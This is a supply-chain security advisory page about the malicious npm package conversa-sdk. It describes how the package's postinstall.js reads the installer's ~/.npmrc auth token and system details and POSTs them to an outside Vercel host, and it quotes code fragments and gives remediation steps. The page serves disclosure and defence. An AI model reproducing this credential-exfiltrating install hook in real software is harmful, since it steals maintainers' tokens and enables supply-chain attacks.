Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in conversa-sdk (npm)

conversa-sdk

Risk score

92

AI summary

Indexed incident for conversa-sdk (npm).

Description

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) together with the OS username, hostname, Node version and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate.

The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })).

The README explicitly claims 'No home-directory writes / No network calls during install'; this is a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. A stolen npm auth token gives the attacker whatever rights that token carries; a classic publish-capable token lets them push new versions of every package the victim maintains, enabling an onward supply-chain pivot. Anyone who installed an affected version should treat the token in ~/.npmrc as compromised, revoke it, and review recent publishes on the packages it could write to.

Technical details

Affected versions

=2.0.2, =1.0.9

Indicators

  • affected version =2.0.2 (75%)
  • affected version =1.0.9 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents